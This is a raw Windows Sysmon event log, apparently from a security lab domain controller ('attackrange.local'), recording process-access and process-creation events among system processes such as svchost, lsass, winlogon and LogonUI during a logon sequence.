13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.414{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-93F6-6005-E704-00000000A301}45723808C:\Windows\system32\winlogon.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.414{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.420{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3a74055 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e72SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000009740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.414{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-1600-00000000A301}15442212C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.399{59A5CD1D-8E46-6005-1600-00000000A301}15442212C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.399{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.399{59A5CD1D-8E46-6005-1600-00000000A301}15442212C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.399{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.258{59A5CD1D-93F6-6005-E604-00000000A301}48883944C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\winsrv.DLL+1ef0|C:\Windows\system32\winsrv.DLL+17e9|C:\Windows\system32\winsrv.DLL+1579|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.243{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 